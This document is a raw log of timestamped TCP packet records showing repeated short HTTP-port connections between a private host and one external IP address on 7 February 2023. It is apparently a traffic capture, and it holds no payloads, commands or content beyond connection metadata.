Feb 7, 2023 20:03:42.848011017 CET	50333	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:42.848901033 CET	50334	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:42.909872055 CET	80	50334	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:42.910130024 CET	50334	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:42.910171986 CET	80	50333	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:42.910271883 CET	50333	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:42.924732924 CET	50334	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:42.986017942 CET	80	50334	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:42.988635063 CET	80	50334	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:42.988796949 CET	50334	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:43.105947018 CET	50334	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:43.107064962 CET	50335	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:43.166707039 CET	80	50334	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:43.166889906 CET	50334	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:43.168657064 CET	80	50335	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:43.168862104 CET	50335	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:43.169375896 CET	50335	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:43.230848074 CET	80	50335	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:43.234117985 CET	80	50335	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:43.237179995 CET	50335	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:43.360068083 CET	50335	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:43.360832930 CET	50336	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:43.421240091 CET	80	50336	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:43.421441078 CET	80	50335	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:43.421598911 CET	50335	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:43.421634912 CET	50336	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:43.422466040 CET	50336	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:43.482798100 CET	80	50336	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:43.485089064 CET	80	50336	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:43.485316038 CET	50336	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:43.595221043 CET	50336	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:43.596478939 CET	50337	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:43.656085014 CET	80	50336	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:43.657077074 CET	50336	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:43.658428907 CET	80	50337	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:43.659965038 CET	50337	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:43.661817074 CET	50337	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:43.724813938 CET	80	50337	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:43.726258039 CET	80	50337	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:43.726377010 CET	50337	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:43.844352007 CET	50337	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:43.845599890 CET	50338	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:43.905917883 CET	80	50338	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:43.905963898 CET	80	50337	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:43.906102896 CET	50337	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:43.906107903 CET	50338	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:43.908584118 CET	50338	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:43.968796015 CET	80	50338	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:43.971452951 CET	80	50338	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:43.972867012 CET	50338	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:44.085722923 CET	50338	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:44.089718103 CET	50339	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:44.146152020 CET	80	50338	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:44.146316051 CET	50338	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:44.149980068 CET	80	50339	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:44.150168896 CET	50339	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:44.150749922 CET	50339	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:44.211800098 CET	80	50339	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:44.215348959 CET	80	50339	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:44.216483116 CET	50339	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:44.332395077 CET	50339	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:44.333447933 CET	50340	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:44.392905951 CET	80	50339	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:44.393112898 CET	50339	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:44.393788099 CET	80	50340	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:44.393928051 CET	50340	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:44.394521952 CET	50340	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:44.455086946 CET	80	50340	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:44.458031893 CET	80	50340	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:44.458163977 CET	50340	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:44.578542948 CET	50340	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:44.580296040 CET	50341	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:44.639096975 CET	80	50340	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:44.639359951 CET	50340	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:44.642210960 CET	80	50341	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:44.642450094 CET	50341	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:44.643208981 CET	50341	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:44.703699112 CET	80	50341	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:44.706828117 CET	80	50341	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:44.708693981 CET	50341	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:44.814821959 CET	50341	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:44.816181898 CET	50342	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:44.875597954 CET	80	50341	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:44.876806021 CET	50341	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:44.877450943 CET	80	50342	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:44.882594109 CET	50342	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:44.892172098 CET	50342	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:44.953567982 CET	80	50342	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:44.955727100 CET	80	50342	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:44.957267046 CET	50342	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:45.070033073 CET	50342	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:45.070929050 CET	50343	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:45.131464958 CET	80	50342	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:45.132586002 CET	50342	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:45.133228064 CET	80	50343	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:45.133475065 CET	50343	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:45.134037018 CET	50343	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:45.196463108 CET	80	50343	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:45.200069904 CET	80	50343	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:45.200256109 CET	50343	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:45.323123932 CET	50343	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:45.324001074 CET	50344	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:45.383693933 CET	80	50344	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:45.383894920 CET	50344	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:45.384588957 CET	50344	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:45.385550022 CET	80	50343	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:45.385629892 CET	50343	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:45.443850040 CET	80	50344	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:45.446480989 CET	80	50344	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:45.446717978 CET	50344	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:45.563036919 CET	50344	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:45.563839912 CET	50345	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:45.622395992 CET	80	50344	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:45.622632027 CET	50344	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:45.624257088 CET	80	50345	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:45.624423981 CET	50345	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:45.626091003 CET	50345	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:45.686986923 CET	80	50345	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:45.689590931 CET	80	50345	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:45.689785004 CET	50345	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:45.797205925 CET	50345	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:45.798165083 CET	50346	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:45.857846022 CET	80	50345	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:45.858181953 CET	50345	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:45.860595942 CET	80	50346	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:45.860891104 CET	50346	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:45.861769915 CET	50346	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:45.924268961 CET	80	50346	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:45.927083969 CET	80	50346	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:45.927321911 CET	50346	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:46.033761978 CET	50346	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:46.035945892 CET	50347	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:46.096285105 CET	80	50346	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:46.096510887 CET	50346	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:46.098584890 CET	80	50347	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:46.098774910 CET	50347	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:46.099226952 CET	50347	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:46.161560059 CET	80	50347	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:46.165688038 CET	80	50347	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:46.165915012 CET	50347	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:46.282746077 CET	50347	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:46.283595085 CET	50348	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:46.344083071 CET	80	50348	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:46.344444990 CET	50348	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:46.345175982 CET	80	50347	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:46.345273018 CET	50347	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:46.349889040 CET	50348	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:46.410321951 CET	80	50348	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:46.412662029 CET	80	50348	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:46.412872076 CET	50348	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:46.516949892 CET	50348	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:46.542746067 CET	50349	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:46.577467918 CET	80	50348	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:46.577604055 CET	50348	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:46.604219913 CET	80	50349	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:46.604415894 CET	50349	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:46.609528065 CET	50349	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:46.671102047 CET	80	50349	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:46.673799038 CET	80	50349	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:46.673907042 CET	50349	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:46.785402060 CET	50349	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:46.786159039 CET	50350	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:46.846961975 CET	80	50349	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:46.847215891 CET	50349	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:46.847400904 CET	80	50350	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:46.847533941 CET	50350	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:46.848979950 CET	50350	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:46.910355091 CET	80	50350	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:46.912657022 CET	80	50350	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:46.912786961 CET	50350	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:47.033976078 CET	50350	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:47.034848928 CET	50351	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:47.095444918 CET	80	50350	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:47.095561028 CET	50350	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:47.096383095 CET	80	50351	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:47.096494913 CET	50351	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:47.097069025 CET	50351	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:47.158720970 CET	80	50351	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:47.161994934 CET	80	50351	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:47.162220001 CET	50351	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:47.294236898 CET	50351	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:47.295300961 CET	50352	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:47.355911970 CET	80	50352	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:47.355961084 CET	80	50351	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:47.356226921 CET	50351	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:47.357137918 CET	50352	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:47.357137918 CET	50352	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:47.418098927 CET	80	50352	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:47.420408010 CET	80	50352	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:47.420809984 CET	50352	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:47.533350945 CET	50352	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:47.534713984 CET	50353	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:47.594134092 CET	80	50352	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:47.595122099 CET	50352	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:47.598632097 CET	80	50353	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:47.598807096 CET	50353	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:47.599615097 CET	50353	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:47.662116051 CET	80	50353	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:47.664232969 CET	80	50353	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:47.664314032 CET	50353	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:47.782289982 CET	50353	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:47.783574104 CET	50354	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:47.844867945 CET	80	50353	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:47.845346928 CET	80	50354	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:47.845523119 CET	50353	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:47.845611095 CET	50354	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:47.847893000 CET	50354	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:47.909691095 CET	80	50354	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:47.911897898 CET	80	50354	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:47.912117004 CET	50354	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:48.019876003 CET	50354	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:48.020787001 CET	50355	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:48.081244946 CET	80	50355	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:48.081633091 CET	80	50354	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:48.081886053 CET	50354	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:48.081902981 CET	50355	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:48.094654083 CET	50355	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:48.155996084 CET	80	50355	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:48.159996033 CET	80	50355	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:48.160839081 CET	50355	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:48.267029047 CET	50355	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:48.268038034 CET	50356	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:48.327666044 CET	80	50355	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:48.327862024 CET	50355	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:48.330605030 CET	80	50356	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:48.330831051 CET	50356	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:48.331429005 CET	50356	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:48.394036055 CET	80	50356	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:48.396509886 CET	80	50356	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:48.396708012 CET	50356	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:48.501043081 CET	50356	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:48.501894951 CET	50357	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:48.562501907 CET	80	50357	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:48.562782049 CET	50357	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:48.563249111 CET	50357	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:48.563950062 CET	80	50356	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:48.564090014 CET	50356	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:48.623908043 CET	80	50357	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:48.626431942 CET	80	50357	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:48.626586914 CET	50357	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:48.737071037 CET	50357	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:48.738477945 CET	50358	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:48.797744989 CET	80	50357	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:48.797774076 CET	80	50358	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:48.797844887 CET	50357	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:48.797970057 CET	50358	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:48.800827980 CET	50358	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:48.860233068 CET	80	50358	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:48.862360954 CET	80	50358	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:48.862500906 CET	50358	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:48.969055891 CET	50358	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:48.970136881 CET	50359	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:49.028536081 CET	80	50358	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:49.028762102 CET	50358	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:49.031349897 CET	80	50359	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:49.031467915 CET	50359	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:49.032955885 CET	50359	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:49.094641924 CET	80	50359	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:49.098532915 CET	80	50359	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:49.098741055 CET	50359	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:49.204313993 CET	50359	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:49.206432104 CET	50360	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:49.265721083 CET	80	50359	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:49.265919924 CET	50359	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:49.269117117 CET	80	50360	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:49.269345999 CET	50360	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:49.278758049 CET	50360	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:49.341351032 CET	80	50360	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:49.343576908 CET	80	50360	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:49.343684912 CET	50360	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:49.503448009 CET	50360	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:49.504461050 CET	50361	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:49.564917088 CET	80	50361	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:49.565135002 CET	50361	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:49.565589905 CET	50361	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:49.566092968 CET	80	50360	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:49.566189051 CET	50360	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:49.626081944 CET	80	50361	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:49.628758907 CET	80	50361	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:49.628844976 CET	50361	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:49.734774113 CET	50361	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:49.735555887 CET	50362	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:49.795201063 CET	80	50361	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:49.795531034 CET	50361	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:49.795932055 CET	80	50362	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:49.796118975 CET	50362	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:49.798074961 CET	50362	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:49.858635902 CET	80	50362	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:49.861625910 CET	80	50362	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:49.861816883 CET	50362	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:49.971112967 CET	50362	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:49.971857071 CET	50363	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:50.031934977 CET	80	50362	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:50.032026052 CET	50362	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:50.032187939 CET	80	50363	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:50.032308102 CET	50363	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:50.032689095 CET	50363	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:50.093184948 CET	80	50363	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:50.096600056 CET	80	50363	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:50.096673012 CET	50363	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:50.204031944 CET	50363	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:50.204835892 CET	50364	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:50.264719009 CET	80	50363	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:50.264820099 CET	50363	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:50.265430927 CET	80	50364	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:50.265599012 CET	50364	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:50.279050112 CET	50364	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:50.339798927 CET	80	50364	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:50.342825890 CET	80	50364	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:50.343008041 CET	50364	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:50.454521894 CET	50364	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:50.455487013 CET	50365	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:50.515165091 CET	80	50364	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:50.515321970 CET	50364	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:50.515949965 CET	80	50365	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:50.516064882 CET	50365	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:50.517630100 CET	50365	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:50.578118086 CET	80	50365	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:50.581003904 CET	80	50365	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:50.581067085 CET	50365	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:50.693223000 CET	50365	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:50.694226980 CET	50366	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:50.753987074 CET	80	50365	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:50.754156113 CET	50365	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:50.756520987 CET	80	50366	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:50.756783009 CET	50366	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:50.757392883 CET	50366	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:50.820414066 CET	80	50366	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:50.822324991 CET	80	50366	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:50.822402954 CET	50366	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:50.938436031 CET	50366	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:50.939240932 CET	50367	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:51.000080109 CET	80	50367	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:51.000226974 CET	50367	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:51.000812054 CET	80	50366	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:51.000907898 CET	50366	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:51.006859064 CET	50367	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:51.067262888 CET	80	50367	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:51.071639061 CET	80	50367	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:51.071878910 CET	50367	80	192.168.2.6	62.204.41.4
